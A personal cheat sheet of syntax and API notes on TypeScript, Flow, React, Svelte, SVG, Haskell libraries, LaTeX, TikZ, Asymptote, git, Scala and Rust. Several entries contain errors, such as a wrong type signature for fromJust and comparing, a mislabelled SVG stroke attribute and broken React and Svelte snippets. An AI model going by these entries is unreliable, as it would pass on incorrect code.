let add: (a: number, b: number) => number = ...;
function f(
	a: number,
	defArg: number = 1,
	optArg?: number,
	...varArgs: number[]): string { ... }

interface Thing { ... }
function method(this: Thing) { ... }

interface FillStyle {
	color: string;
	width?: number;
}
interface StyleWithStuff {
	color: string;
	[prop: string]: any;
}
interface NumericBinaryOperator {
	(a: number, b: number): number;
}
interface StringArray {
	[index: number]: string;
}

function identity<T>(arg: T): T { return arg; }

if (typeof foo === "number") { ... }
class Thing { ... }
if (thing instanceof Thing) { ... }

Flow

• The type of undefined is void, not undefined
• The uninhabitable type is empty, not never
• (1 + 1 : number) is a type assertion. It fails to typecheck if the type is wrong. To cast, type-assert through any.
• {| foo: bar |} is an "exact object type" that cannot have additional properties.

GreaseMonkey

// ==UserScript==
// @name        name
// @version     1
// @namespace   https://www.example.com/
// @description description
// @include     https://www.example.com/*
// @grant       none
// ==/UserScript==
// Include and exclude rules use * to glob.

SVG

<svg width="200" height="200" viewBox="0 0 200 200" xmlns="http://www.w3.org/2000/svg">
  <circle cx="10" cy="10" r="2" fill="red" stroke="blue" stroke-width="3" stroke-dasharray="3 1"/>
  <ellipse cx="10" cy="10" rx="2" ry="3"/>
  <rect x="20" y="20" width="100" height="100"/>
  <line x1="20" y1="20" x2="40" y2="40"/>
  <path d="M10 10" stroke-linecap="bevel|miter|round" stroke-linecap="butt|round|square"/>
  (undersupported stroke-linecap values: arcs; miter-clip)
</svg>

SVG path

• M x y || m dx dy // move
• L x y || l dx dy // line
• H x || h dx // horizontal line
• V y || v dy // vertical line
• Z || z // close path; equivalent
• C x1 y1 x2 y2 x y || c dx1 dy1 dx2 dy2 dx dy // Bézier
• S x2 y2 x y || s dx2 dy2 dx dy // Bézier; first control point is reflection of second from previous C or S
• Q x1 y1 x y || q dx1 dy1 dx2 dx dy // quadratic (one control point)
• A rx ry xrot-in-degrees is-large-arc-0-or-1 is-clockwise-0-or-1 x y || a rx ry xrot is-large-arc is-sweep dx dy // arc of ellipse, complicated and not something I want to bother with today

Note: Manipulating these attributes requires .getAttributeNS(null, key) | .setAttributeNS(null, key, value), because something namespaces something.

React

npx create-react-app my-app --template typescript

const element = <div id={expr}>{text}</div>;

ReactDOM.createRoot(document.getElementById("root")).render(<Game />);

Functional component

function Widget(props) {
  return /* use props */;
}

Class component

// perf: inherit from React.PureComponent to skip updates if prop, state are
// shallowly equal to past values
class Widget extends React.Component {
  // only place where you assign to this.state, everywhere else call this.setState
  constructor(props) {
    super(props); this.state = {};

    // refs for "imperative HTML things" or class components
    this.widgetRef = React.createRef();
    // later, if (this.widgetRef.current !== null) this.widgetRef.current.focus();
  }

  render() {
    // common pattern
    const { foo, bar } = this.props;
    const { baz, quux } = this.state;
    return <input ref={this.widgetRef}>...</input>;
  }

  // note, arrow function instead of method so we bind `this`!! ("public instance field", via)
  // let us pass this.handleClick as prop to things
  handleClick = () => {
    // you should use this.state immutably! setState implicitly merges a la Object.assign
    this.setState({ foo: bar });
    // React may batch calls; if modification depends on previous state, do:
    this.setState((state, props) => { foo: !state.foo });
    // also can pass second arg, callback, which will read updated state
  }

  // lifecycle methods
  // setup/teardown, e.g. timers, websockets... generally put in members, not this.state
  componentDidMount() {
    this.timeout = window.setInterval(this.tick, 1000);
  }
  componentWillUnmount() {
    window.clearInterval(this.timeout);
  };
}

controlled components

handleChange = (event) => {
  this.setState({ value: event.target.value });
}

<input type="text" value={this.state.value} onChange={this.handleChange} />

// React select
<select value={this.state.value} onChange={this.handleChange}>
  <option value="foo">Foo</option>
</select>

<input
  type="checkbox"
  checked={selected}
  onChange={this.handleChange}
/>

this.setState({ value: event.target.value });
<input
  type="radio"
  name="groupName"
  value="foo"
  checked={this.state.value === "foo"}
  onChange={this.handleChange}
/>

hooks?

const ThemeContext = React.createContext({ foo: bar });
<ThemeContext.Provider value=> ... </ThemeContext.Provider>

function Example() {
  // setCount does not merge. can still pass func that takes old state, for batching
  const [count, setCount] = useState(0 /* initial state */);
  // can pass a function as initialState for perf, since initialState would be
  // eagerly evaluated every render

  // after each render: combines componentDidMount, componentDidUpdate
  useEffect(
    () => {
      document.title = `You clicked ${count} times`;

      // optionally, componentWillUnmount-ish cleanup
      // but note that by default we cleanup before each new effect call, by design!
      return () => ...;
    },
    // optional list of dependencies, skip update if 1-deep equal
    [count] // in particular, [] would mean only mount/unmount
  );

  // non-state-affecting memoization, dependencies as above
  let result = useMemo(() => computeExpensiveValue(a, b), [a, b]);

  // plumb data from far away
  const theme = useContext(ThemeContext);
  theme.foo;

  // mini Redux
  // earlier: function reducer(state, action) { return /* new state */; }
  const [state, dispatch] = useReducer(reducer, initialState);

  // ref or any imperative thing to grab
  const inputEl = useRef(null);
  inputEl.current;

  return /* count */;
}

Svelte

let foo = 0;

export let foo /* = "optional default value" */;

$: bar = baz(foo, quux);

Mutating state variables is more OK than in React because the compiler has a better understanding that they should cause recalculations; in particular foo[bar] = baz seems to be totally kosher. Calling mutating functions (e.g. foo.push(1) won't work, but you can just invalidate with foo = foo; after. (Or you can stick to foo = [...foo, 1]...)

A simple rule of thumb: the updated variable must directly appear on the left hand side of the assignment.

{expr}
<div foo={bar}> or (to appease syntax highlighters) <div foo="{bar}">

{#if condition}
HTML goes here
{:else if} (!)
{:else} (!)
{/if}
{#each expression as name}...{/each}
{#each expression as name, index}...{/each} // as in Array.map
{#each expression as name (key)}...{/each} // expr like React's key for reconciliation
{#each expression as name, index (key)}...{/each}
{#each expression as name}...{:else}...{/each} // empty

<button on:click={handle}>

<button on:click|preventDefault|stopPropagation|capture|once={handle}>

<div class:active={active}> // that class if truthy
<div class:active> // or even shorthand...
<div style:color={myColor}>

<input type="text" bind:value={foo}> (or "number", etc.)
<input type="checkbox" bind:checked={foo}>
<input type="radio" bind:group={foo} value={"bar"}>
<canvas bind:this={canvas}/> // for imperative stuff

Lifecycle calls must be at the top level:

import { onMount } from 'svelte';
onMount(
  // some function that might set state
  // can also return a cleanup function
);
beforeUpdate(/* ... */);
afterUpdate(/* ... */);
onDestroy(/* ... */);

<svelte:self/> // recursion!
<svelte:component this={thing} foo={bar}/>
// i.e. given RedThing.svelte, BlueThing.svelte,
<svelte:component this={foo ? RedThing : BlueThing}/>

<svelte:element this={"div"}/>hi</svelte:element>

<svelte:window on:event={handler}/>
<svelte:body on:event={handler}/>
<svelte:head/> /* head tags */ </svelte:head>

// in some module:
import { writable } from 'svelte';
let v = writable(0);

// components can import v from that module and use or assign to $v
// which is roughly sugar for
let localV;
v.subscribe(v => { localV = v; });
$v = newValue; // sugar for v.set(newValue);
v.update(v > newValue);

<div>{localV}</div>

import { setContext, getContext } from 'svelte';
setContext('answer', 42);
// ...
getContext('answer'); // from closest parent component

import { fade, ... } from 'svelte/transition';
{#if visible}
	<div transition:fade>fades in and out</div>
	<div in:fade>fades in</div>
	<div out:fade>fades out</div>
{/if}

{#key expr}...{/key}

Typeclass Syntax

class Foo a where
foo :: a -> a
instance Foo Int where
	foo = (+2)
class Foo a => Bar a where
	bar :: a -> a
instance Bar Int where
	bar = subtract 2
class (Foo a, Bar a) => Quux a where
	quux :: a -> a
instance Quux Int where
	quux = (*2)

from Functional Python

Precedence

Functions

Control.Monad

m is a monad. * = append _ to return m () instead.

• (>>=) :: m a → (a → mb) → m b
• (>>) :: m a → m b) → m b
• (=<<) :: (a → mb) → m a → m b
• sequence * :: [m a] → m [a]
• mapM * :: (a → m b) → [a] → m b
• forM * :: [a] → (a → m b) → m b
• forever :: m a → m b
• void :: Functor f ⇒ f a → f ()
• join :: m (m a) → m a
• msum :: MonadPlus p ⇒ [p a] → p a
• guard :: MonadPlus p ⇒ Bool → p ()
• when :: Bool → m () → m ()

ST (Control.Monad.ST + Data.STRef)

• runST :: (forall s. ST s a) → a
• readSTRef :: STRef s a → ST s a
• writeSTRef :: STRef s a → a → ST s ()
• modifySTRef' :: STRef s a → (a → a) → ST s ()

Arrays in ST

(type constraints are elided, a = mutable array, c = immutable ("constant") array)

• runSTArray :: (forall s. ST s (STArray s i e)) → Array i e
• runSTUArray :: (forall s. ST s (STUArray s i e)) → Array i e
• newArray :: (i, i) → e → m (a i e)
  • note, when necessary, this is a good place to specialize ST: foo <- newArray (0,9) False :: ST s (STArray s Int Bool)
• newArray_ :: (i, i) → m (a i e)
• readArray :: a i e → i → m e
• writeArray :: a i e → i → e → m e
• getElems :: a i e → m e
• getAssocs :: a i e → m [(i,e)]
• freeze :: a i e → m (c i e)
• thaw :: c i e → m (a i e)

(Variants of freeze and thaw prefixed with unsafe, which don't copy the array, are in Data.Array.Unsafe.)

Vectors in ST (Data.Vector.Mutable)

Import qualified. Obvious functions' type signatures not given. Data.Vector.Unboxed.Mutable has a nearly identical interface. Constructors yield PrimMonad m ⇒ m (MVector (PrimState m) a); destructive functions take and manipulate PrimMonad m ⇒ MVector (PrimState m) a. These constraints are not shown below for simplicity. Note that the slicing functions are pure and yield views through which the original vector can be modified.

u* denotes presence of an unsafe variant obtainable by prefixing unsafe and camelCasing. Here, unsafe means no bounds checking.

• data MVector s a "vec"
• type IOVector = MVector RealWorld for IO monad
• type STVector s = MVector s for ST monad
• length, null, head, last, init, tail, take, drop, splitAt :: ... (also have unsafe variants)
• new :: Int → m vec
• replicate :: Int → a → m (vec a)
• replicateM :: Int → m a → m (vec a)
• u* read :: vec a → Int → m a
• u* write :: vec a → Int → a → m ()
• u* swap :: vec a → Int → Int → m ()

Interface with pure Vector code (import from Data.Vector; here, unsafe means no whole-array-copying):

• create :: (forall s. ST s (MVector s a)) → Vector a
• modify :: (forall s. MVector s a → ST s ()) → Vector a → Vector a
• u* freeze :: vec a → m (Vector a)
• u* thaw :: Vector a → m (vec a)
• u* copy :: vec a → Vector a → m ()

Data.Array / Data.Vector

Data.Vector has far more functions and typeclasses, but Data.Array can be multidimensional, can have indices defined arbitrarily, and is currently more portable. Its only Array-ish typeclass of interest is Functor.

• array :: Ix i ⇒ (i, i) → [(i, e)] → Array i e
• listArray :: Ix i ⇒ (i, i) → [e] → Array i e
• (!) :: Ix i ⇒ Array i e → i → e
• indices :: Ix a ⇒ Array i e → [i]
• elems :: Ix a ⇒ Array i e → [e]
• assocs :: Ix a ⇒ Array i e → [(i, e)]
• (//) :: Ix i ⇒ Array i e → [(i, e)] → Array i e

Data.Vector must be imported qualified. Functions already listed in family table or as unsafe interface functions above aren't here. Obvious functions' type signatures not given. Data.Vector.Unboxed has a nearly identical interface.

u* denotes presence of an unsafe variant obtainable by prefixing unsafe and camelCasing. [M] denotes a monadic version (with a different type, working with Kleisli arrows).

• unsafeHead, unsafeLast, unsafeInit, unsafeTail, unsafeTake, unsafeDrop
• slice :: Int → Int → Vector a → Vector a starting index, length
• u* indexM, u* headM, u* lastM :: Monad m ⇒ Vector a → (Int →) m a allows forcing strictness
• generate [M] :: Int → (Int → a) → Vector a
• iterateN :: Int → (a → a) → a → Vector a
• unfoldr :: ...
• (//) :: Vector a → [(Int, a)] → Vector a
• update :: Vector a → Vector (Int, a) → Vector a
• indexed :: Vector a → Vector (Int, a)
• imap :: (Int → a → b) → Vector a → Vector b
• ifilter :: (Int → a → Bool) → Vector a → Vector a
• maxIndex, minIndex[By] :: ...
• fromList :: ...

Data.ByteString[.Char8] | Data.Text (not mentioned in below table, plus copy)

a is the element type, Word8 or Char. S is the string type, ByteString or Text.

Data.Char

• isControl, isSpace, isLower, isUpper, isAlpha, isAlphaNum, isPrint, isDigit, isOctDigit, isHexDigit, isLetter, isMark, isNumber, isPunctuation, isSymbol, isSeparator, isAscii, isLatin1, isAsciiUpper, isAsciiLower :: Char → Bool
• toUpper, toLower, toTitle :: Char → Char
• digitToInt :: Char → Int
• intToDigit :: Int → Char
• ord :: Char → Int
• chr :: Int → Char

Data.Function

• on :: (b → b → c) → (a → b) → a → a → c

Data.List and Friends

C a generically denotes a container containing objects of type a.

Data.List (not mentioned above)

Note: Nearly every function on Foldables, defined in Data.Foldable, has a list-specific version in Data.List; see above. These are not listed although they're technically not the same functions.

• intersperse :: a → [a] → [a]
• intercalate :: [a] → [[a]] → [a]
• transpose :: [[a]] → [[a]]
• subsequences :: [a] → [[a]]
• permutations :: [a] → [[a]]
• iterate :: (a → a) → a → [a]
• repeat :: a → [a]
• cycle :: [a] → [a]
• lines, words :: String → [String]
• unlines, unwords :: [String] → String
• nub :: Eq a ⇒ [a] → [a]
• nubBy :: (a → a → Bool) → [a] → [a]

Data.Map

Note: Many names clash with Prelude; please import qualified Data.Map as Map

• Lookup
  • (!) :: Ord k ⇒ Map k a → k → a
  • (!?) :: Ord k ⇒ Map k a → k → Maybe a (since 0.5.9)
  • lookup :: Ord k ⇒ k → Map k a → Maybe a note: (!) and lookup have flipped arguments
  • findWithDefault :: Ord k ⇒ a → k → Map k a → a
  • lookup[LT,GT,LE,GE] :: Ord k ⇒ k → Map k v → Maybe (k, v)
  • member :: Ord k → k → Map k a → Bool
• Size
  • null :: Map k a → Bool
  • size :: Map k a → Int
• Construction
  • empty :: Map k a
  • singleton :: k → a → Map k a
• Insertion and modification
  • insert :: Ord k ⇒ k → a → Map k a → Map k a
  • insertWith :: Ord k ⇒ (a → a → a) → k → a → Map k a → Map k a
  • delete :: Ord k ⇒ k → Map k a → Map k a
  • adjust :: Ord k ⇒ (a → a) → k → Map k a → Map k a
  • update :: Ord k ⇒ (a → Maybe a) → k → Map k a → Map k a
  • alter :: Ord k ⇒ (Maybe a → Maybe a) → k → Map k a → Map k a
• Combination
  • union :: Map k a → Map k a → Map k a
  • unions :: [Map k a] → Map k a
• To/from list
  • map :: (a → b) → Map k a → Map k b
  • elems :: Map k a → [a]
  • keys :: Map k a → [k]
  • toList :: Map k a → [(k, a)]
  • fromList :: Ord k ⇒ [(k, a)] → Map k a
  • fromListWith :: Ord k ⇒ (a → a → a) → [(k, a)] → Map k a (combines values; prototypical usage: Map.fromListWith (+) $ map (,1) xs)
• Min/max
  • lookupMin :: Map k a → Maybe (k, a)
  • findMin :: Map k a → (k, a)
  • minView :: Map k a → Maybe (a, Map k a)
  • minViewWithKey :: Map k a → Maybe ((k, a), Map k a)

Data.Maybe

• maybe :: b → (a → b) → Maybe a → b
• isJust :: Maybe a → Bool
• isNothing :: Maybe a → Bool
• fromJust :: Maybe a → Bool
• fromMaybe :: a → Maybe a → a
• listToMaybe :: [a] → Maybe a
• maybeToList :: Maybe a → [a]
• catMaybes :: [Maybe a] → [a]
• mapMaybe :: (a → Maybe b) → [a] → [b]

Data.Monoid

• mappend (≡ (<>)) :: (Monoid a) ⇒ a → a → a

newtypes:

• Dual a = Dual { getDual :: a } monoid with `mappend` parameters flipped
• Endo a = Endo { appEndo :: a → a } function composition
• All = All { getAll :: Bool }
• Any = Any { getAny :: Bool }
• Sum a = Sum { getSum :: a } addition monoid w/ (Num a)
• Product a = Product { getProduct :: a } multiplication monoid w/ (Num a)
• First a = First { getFirst :: Maybe a }
• Last a = Last { getLast :: Maybe a }

Data.Ord

• comparing :: (Ord a) ⇒ (b → a) → b → b → b → Ordering (used for e.g. sortBy)

newtype Down a

• Eq a ⇒ Eq (Down a)
• Ord a ⇒ Ord (Down a) reverses order

Data.Set

Note: Many names clash with Prelude; please import qualified Data.Set as Set

• member :: Ord a ⇒ a → Set a → Bool
• null :: Set a → Bool
• size :: Set a → Int
• lookup[LT,GT,LE,GE] :: Ord a ⇒ a → Set a → Maybe a
• empty :: Set a
• singleton :: a → Set a
• insert :: Ord a ⇒ a → Set a → Set a
• delete :: Ord a ⇒ a → Set a → Set a
• elems (≡ toAscList) :: Set a → [a]
• lookupMin :: Set a → Maybe a
• findMin :: Set a → a
• minView :: Set a → Maybe (a, Set a)
• toList :: Set a → [a]
• fromList :: [a] → Set a

Debug.Trace

• trace :: String → a → a
• traceShow :: (Show a) ⇒ a → b → b

System.IO

• stdin, stdout, stderr :: Handle
• withFile :: FilePath → IOMode → (Handle → IO r) → IO r
• openFile :: FilePath → IOMode → IO Handle
• hClose :: Handle → IO ()
• readFile :: FilePath → IO String
• writeFile, appendFile :: FilePath → String → IO ()
• hFileSize :: Handle → IO Integer
• hGetLine :: Handle → IO String
• hGetContents :: Handle → IO String

Stuff

\includegraphics[width=\textwidth]{grasshopper.jpg}

(Mac) Use TeX Live Utility to install from repos. Or, stuff goes in ~/Library/texmf/tex/latex. LaTeX will find it.

Text Size

tiny, scriptsize, footnotesize, small, normalsize, large, Large, LARGE, huge, Huge

Alignment and Space etc.

\noindent; \hfill, \vfill, \hspace{...}, \vspace{...}

Centering: \begin{center} ... \end{center} for a paragraph or so, \centerline{...} for a line continuing the same paragraph

Same-sizing things: \left, \right, possibly \middle. \middle\mid doesn't work, use \mathrel{}\middle|\mathrel{} instead.

Boxes

Horizontal box of fixed width: \makebox[5cm][c]{Text}

Paragraph box of fixed width: \parbox[c]{5cm}{Line one \\ Line two}

Tabular, for box that takes width of longest line: \begin{tabular}{@{}c{@}}Line one \\ Line two\end{tabular}

Raise box: \raisebox{5cm}{text}

Minipage: \begin{minipage}[t]{5cm} \end{minipage}

References

\begin{equation} \label{eq:life}
6 \times 9 = 42
\end{equation}

Equation \ref{eq:life} is good. \eqref{eq:life} is good.

Defining

\DeclareMathOperator{\End}{End} ≡ \newcommand{\End}{\operatorname{End}} (also, starred versions typeset limits under/over, instead of as sub/superscripts)

Things Above and Below

• \overset{top}{=}
• \underset{bot}{=}
• \overbrace{x + y}^{top} (or overbracket)
• \underbrace{x + y}_{top} (or underbracket)
• \xrightarrow{top}, \xrightarrow[bot]{top (or leave blank)} (or xleftarrow, or more arrows/harpoons in \usepackage{mathtools})

Cases

f(x) = \begin{cases}
	0 & \text{if } x = 0 \\
	1 & \text{else}
\end{cases}

Tabular

\begin{tabular}[pos]{table spec}

Packages

• alltt: TODO
• amsfonts: math?
• amsmath: math
• amssymb: math symbols
• color: color
• enumerate: more choices for enumerate item format
• fancyhdr: headers:

  \lhead{...}\rhead{...}\cfoot{\thepage} % set headers
  \pagestyle{fancy} % show headers
  \thispagestyle{plain} % omit headers here (e.g. first page)

• fontspec: ?
• framed: framing a paragraph
• fullpage: ?
• geometry: setting margins: \usepackage[top=1in, bottom=1in, left=1in, right=1in]{geometry} or \usepackage[margin=1in]{geometry}
• graphicx: graphics
• hyperref: makes cross-references into links (suggested to be included last)
• icomma: remove space after comma in $1,000$
• ifpdf: ?
• inputenc: ?
• lastpage: refer to last page with \pageref{\LastPage}
• longtable: ?
• makeidx: ?
• mla: ?
• multirow: \multirow
• natbib: ?
• paralist: ?
• scrpage: ?
• sectsty: ?
• setspace: double spacing
• soul: ?
• syntonly: ?
• tabularx: m, b paragraph aligning in table cells (?)
• textcase: ?
• textcomp: ?
• theorem: ?
• thumbpdf: ?
• times: Times New Roman
• ulem: ?
• url: gives you \url{...} (or \url|...|)
• verbatim: ?
• xeCJK: ?

Asymptote

draw(shape[, pen]);

dot(point[, pen]); (dot's dimension doesn't get scaled)

Label(string s="", align align=NoAlign, pen p=nullpen...)

Programming

Very C/C++/Java-like: essentially same syntax for declaring and initializing variables, numbers, strings, operators, function declaration, control flow (if, while, do, break, continue, for (+ "for each" with for(:)))

^ is xor and ternary conditional exists.

Deviations: bitwise functions are (non-infix) AND, OR, XOR, NOT. There's even CLZ and CTZ. Also only pre(inc/dec)rement exists; no post(inc/dec)rement because infix -- joins paths.

Types: string, int, real, pair, path, guide, pen...

Features var, its type-inferring type declaration (like C++'s auto). It can be used in for(:) loops too.

Pairs are like (3,7). Immutable; function as points, vectors, and complex numbers. Access components with .x, .y. Unit vector in a direction is expi(deg).

Math

Math functions: sin, cos, tan, asin, acos, atan, exp, log, pow10, log10, sinh, cosh, tanh, asinh, acosh, atanh, sqrt, cbrt, fabs, expm1, log1p, Jn(int n, real), Yn(int n, real), gamma, erf, erfc, atan2, hypot, fmod, remainder, degrees(radians_val), radians(degrees_val), abs.

For convenience, Sin, Cos, Tan, aSin, aCos, aTan use degrees.

floor, ceil, round return ints.

Arrays

Arrays are syntactically like Java instead of C/C++. But they're actually mutable-size. T[] is a type and supports .length, push, pop. Weird bonus feature: set an array.cyclic = true to make accessing any index first reduce the index mod the length.

sequence(n) is [0..n-1], sequence(n, m) is [n..m], reverse(a) returns reversed copy, sort(a) returns sorted copy, min(a) and max(a) return minimum or maximum.

Arrays can be sliced with Python syntax to create copies; slices can be assigned to, to change the array, too.

shape

transform

Apply to lots of things by tf * thing

pen

Pens can be +ed together. The default pen can be set with defaultpen(pen);

arrow

The type name is arrowbar because arrows and bars are implemented as the same thing.

ArcArrow is smaller than Arrow, about half the size, and has different angle; it's suitable for curved arrows.

Arrow is the same as EndArrow. Other arrows: Begin[Arc]Arrow, Mid[Arc]Arrow, [Arc]Arrows (on both ends). Or pass position=real (e.g. 0.7) as an argument to the Arrow constructor.

TikZ

\begin{tikzpicture}[scale=2]
\draw(0,0)--(0,1.5);
\draw[dotted](0,1)--(2,3) .. controls (2,4) and (3,5) .. (4,5);
\node[anchor=center] at (2,2) {lorem};
\node[anchor=south west] at (3,3) {ipsum};
\end{tikzpicture}

You can specify units in coordinates e.g. (1cm, 2pt). If unitless, cm implied. Polar coordinates: (30:1cm) Relative coordinates: +(2,0) ("temporarily shifts the pen") or ++(2,0) ("permamently shifts the pen"). Math expressions work in braces e.g.(1,{tan(30)}).

Paths

Making and Drawing Paths

Options for Drawing

Usually you'll put them right after the \draw analogue you're using. But you can set options anywhere in the middle of a path, and you can get a few options to apply to the remaining part of the path or even to a local scope:

\draw (0,0) -- (0,0.5) [xshift=2pt] (0,0) -- (0,0.5);
\draw (0,0) -- (1,1) {[rounded corners] -- (2,0) -- (3,1)} -- (0,0.5);

You can also specify them right after \begin{tikzpicture}, or right after \begin{scope} inside a tikzpicture environment to have then apply to a local scope.

Define/redefine a style like [help lines/.style={blue!50,very thin}] (/. means "don't use; define"). You can access an argument like #1, and set a default as [help lines/.defualt=black].

Math

With \usetikzlibrary{calc}, you can do math in ($ $) brackets (the symbol is chosen to suggest "math" only; there is no math typesetting).

Looping

Something like \foreach \x in {1,2,5}{\draw (\x,0) -- (0,\x);} The range syntax can be like {1,...,10} for a range, or {1,3,...,11} for a skip, or (!?) {1,2,...,5,7,8,...,12}

Arrow Tips

Barbed tips: Arc Barb, Bar, Bracket, Hooks, Parenthesis, Straight Barb, Tee Barb

Math tips: Classical TikZ Rightarrow, Computer Modern Rightarrow, Implies, To

Geometric tips: Circle, Diamond, Ellipse, Kite, Latex, Rectangle, Square, Stealth, Triangle, Turned Square. You can make these open.

Cap tips: Butt Cap, Fast Round (hovering semicircular arc), Fast Triangle (hovering arrow-y concave hexagon), Round Cap, Triangle Cap

Rays[n=8] ends in like an asterisk.

Arrow tip options:

Remember there are five areas:

The actual cheat sheet.

git hash-object filename
8e045dbc7eac808d0fe8a9f2a706247cb0df5b58

git cat-file -t 8e045dbc7eac808d0fe8a9f2a706247cb0df5b58
git cat-file blob 8e045dbc7eac808d0fe8a9f2a706247cb0df5b58

git ls-tree HEAD

Sequences

[Gen] means the collection might be sequential or parallel.

TraversableOnce has foldLeft[B](z: B)(op: (B, A) ⇒ B): B and foldRight[B](z: B)(op: (A, B) ⇒ B): B. There's no reconstruction.

Traversable begins to have stuff like collect[B](pf: PartialFunction[A, B]): CC[B] and map[B](f: (A) ⇒ B): CC[B].

rerun sbt with flags like -deprecation: set scalacOptions in ThisBuild ++= Seq("-unchecked", "-deprecation")

format!("{a} {b}", a=3, b=4);
// pretty like Python str.format. {}, {0}, {:b} etc.
// {} uses fmt::Display
// {:?} uses fmt::Debug, formats text for debugging
// {:#?} pretty printing
// {:b} uses binary etc
print!  println!  eprint!  eprintln! all use this

types

T
&T       &'a T
&mut T   &'a mut T

[T; n]    // array with compile-time-known length
  [expr; n] // expression of such an array

// slices, generally only exist behind some reference or other indirection
&str // always valid UTF-8!
  &'static str // type of string literals
&mut str
&[T]
&mut [T]

(T, U) // and so on
() // unit; implicitly returned

fn longest<'a>(x: &'a str, y: &'a str) -> &'a str { ... }

• Foo::bar
• (&Foo)::bar
• (&mut Foo)::bar
• dereference by finding either Foo: Deref<Target=U> or Foo: DerefMut<Target=U>, recurse on U
  • Note that Deref::deref(&self) → &Self::Target DerefMut::deref_mut(&mut self) → &mut Self::Target

slices

let s = String::from("hello");
&s[0..2]; // &str
&mut s[0..2]; // &mut str

pointers

• Box: Single-ownership heap pointer.
• Rc: Reference counted heap pointer. Immutable. (But — I just learned this — get_mut and try_unwrap can let you mutate or consume the inner value by checking if there are no other pointers to it first, and make_mut can let you mutate or copy-on-write!) Also has Weak, which you can downgrade to or upgrade from.
• Cell: Mutable memory location, used for interior mutability. A non-mut ref is enough to mutate the inside thing. Not thread-safe. Never gives you references, just moves values in and out (so you cannot have an "atomic increment", not that there's any other actions to interleave with you can't control, although you can atomically "swap-and-get"); many methods are only implemented if contents are Copy.
• RefCell: Mutable memory location, used for interior mutability. A non-mut ref is enough to mutate the inside thing. Not thread-safe. Uses a write lock before mutating, tracked at runtime; a client claims temporary exclusive mutable access and can use a mutable reference, but may cause panics (although there are also non-panicking variants).
• UnsafeCell: What backs both of the above.
• Arc: Atomically reference counted heap pointer. Immutable. Thread-safe. Also has Weak, which you can downgrade to or upgrade from.
• Mutex: Mutex-protected mutable data.
• RwLock: Mutex-protected mutable data permitting either multiple readers or one writer.

struct

#[derive(Clone, Debug)]
struct User {
    username: String,
    // ...
};
struct Color(i32, i32, i32)

let mut user1 = User {
    username: String::from("lol"),
    // ...
};

user1.username = String::from("1234"),

let mut user2 = User {
    username: String::from("lol"),
    ..user1
};

impl User {
    fn area(&self) -> String {
        String::clone(self.username)
    }
}

enum Message {
    Quit, // unit
    Move { x: i32, y: i32 }, // struct-like
    Write(String),
    ChangeColor(i32, i32, i32), // tuple-like
}

enum Option<T> {
    Some(T),
    None,
}

// impl also takes type variables
impl<T> Point<T> {
    fn x(&self) -> &T {
        &self.x
    }
}

conversions and ownership acrobatics

Option<T>.unwrap_or(self, T) → T
Option<T>.unwrap_or_default(self) → T where T: Default

&Option<T>.is_some(&self) → bool
&Option<T>.is_none(&self) → bool

Option<T>.map_or(self, U, T → U) → U
Option<T>.and_then(self, T → Option<U>) → Option<U>
Option<T>.ok_or(self, E) → Result<T, E>

Option<T>.unwrap(self) → T (or panic!)
Option<T>.expect(self, &str) → T (or panic!)

&mut Option<T>.take(&mut self) → Option<T>
Option<&T>.copied(self) → Option<T>
Option<&T>.cloned(self) → Option<T>

Result<T, E>.ok(self) → Option<T>
Result<T, E>.err(self) → Option<E>

Result<T, E>.unwrap_or(self, T) → T
Result<T, E>.unwrap_or_default(self) → T where T: Default

Result<T, E>.map_or(self, U, T → U) → U
Result<T, E>.map_or_else(self, E → U, T → U) → U // note the order!
Result<T, E>.and_then(self, T → Result<U, E>) → Result<U, E>

Result<T, E>.unwrap(self) → T (or panic!)
Result<T, E>.expect(self, &str) → T (or panic!)

&Result<T, E>.as_ref(&self) → Result<&T, &E>
&mut Result<T, E>.as_mut(&mut self) → Result<&mut T, &mut E>

Vec

&Vec<T>.len(&self) → usize
// Both type signatures below are fake, you can also slice.
&Vec<T>.get(&self, usize) → Option<&T>
&mut Vec<T>.get_mut(&mut self, usize) → Option<&mut T>

&mut Vec<T>.push(&mut self, T)
&mut Vec<T>.extend(&mut self, IntoIterator<T>) // via Extend<T>

// Pass .. or a..b. Creates iterator (holding a mut ref) that removes that
// range and yields its elements.
&mut Vec<T>.drain(&mut self, RangeBounds<usize>)

&mut Vec<T>.remove(&mut self, usize) → T (or panic!) (shifts things left)
&mut Vec<T>.swap_remove(&mut self, usize) → T (or panic!) (swaps with last element)
&mut Vec<T>.pop(&mut self) → Option<T>

// In particular &v[..], &mut v[..] are slices.

a[b] is sugar for the Index trait, with .index(). Panics if OOB!!

mem::drop(T)
mem::replace(&mut T, T) → T
mem::take(&mut T) → T where T: Default
mem::swap(&mut T, &mut T)

iterators

for e in seq { ... } is always sugar for iterating over seq.into_iter(), but many containers have separate implementations of into_iter for T, &T, &mut T. into_iter() is idempotent on iterators.

for e in 0..n { ... }
for e in 1..=n { ... }

for e in &seq { ... } // seq.iter() (by convention!)
for e in &mut seq { ... } // seq.iter_mut() (by convention!)
for e in seq { ... } // seq.into_iter()

Let T = Self::Item. Type signatures are extremely fake (Iterator and IntoIterator have Item as an output "associated type" rather than an input "type parameter". So an example way to take an iterator:)

fn next_two<A: Iterator>(mut a: A) -> (Option<A::Item>, Option<A::Item>) {
    (a.next(), a.next())
}

You might want to use <A as Iterator>::Item sometimes? Idk.

Manual iteration:

.next() → Option<T>

.map(T → B) → Iterator<B>
.flat_map(T → (U: IntoIterator<B>)) → Iterator<B>
.flatten() → Iterator<B> where T: IntoIterator<
.zip(U: IntoIterator<B>) → Iterator<(T, B)>
.copied() → Iterator<B> where T = &B, B: Copy
.cloned() → Iterator<B> where T = &B, B: Clone

// note the extra reference in the predicate arguments
.filter(&T → bool) → Iterator<T>
.take_while(&T → bool) → Iterator<T>
.skip_while(&T → bool) → Iterator<T>
.find(&T → bool) → Option<T>

&mut .position(T → bool) → Option<usize>

.filter_map(T → Option<B>) → Iterator<B>

.fold(self, B, (B, T) → B) → B
.reduce(self, (T, T) → T) → Option<T> // "fold1"

.enumerate() → Iterator<(usize, T)>

// on &mut!!
.nth(usize) → Option<T> (skips n, then gives you next)

.take(usize) → Iterator<T>
.skip(usize) → Iterator<T>

// only on DoubleEndedIterator
.rev()

Consumers:

.count() → usize
.for_each(T → ())

.any(T → bool) → bool
.all(T → bool) → bool

// You can sum/product numeric types, and Options/Results thereof (monadically)
.sum() → S where S: Sum<T>
.product() → P where P: Product<T>

.max(), .min() → Option<T> where T: Ord
.max_by, .min_by((T, T) → Ordering) → Option<T>
.max_by_key, .min_by_key(T → B) → Option<T> where B: Ord

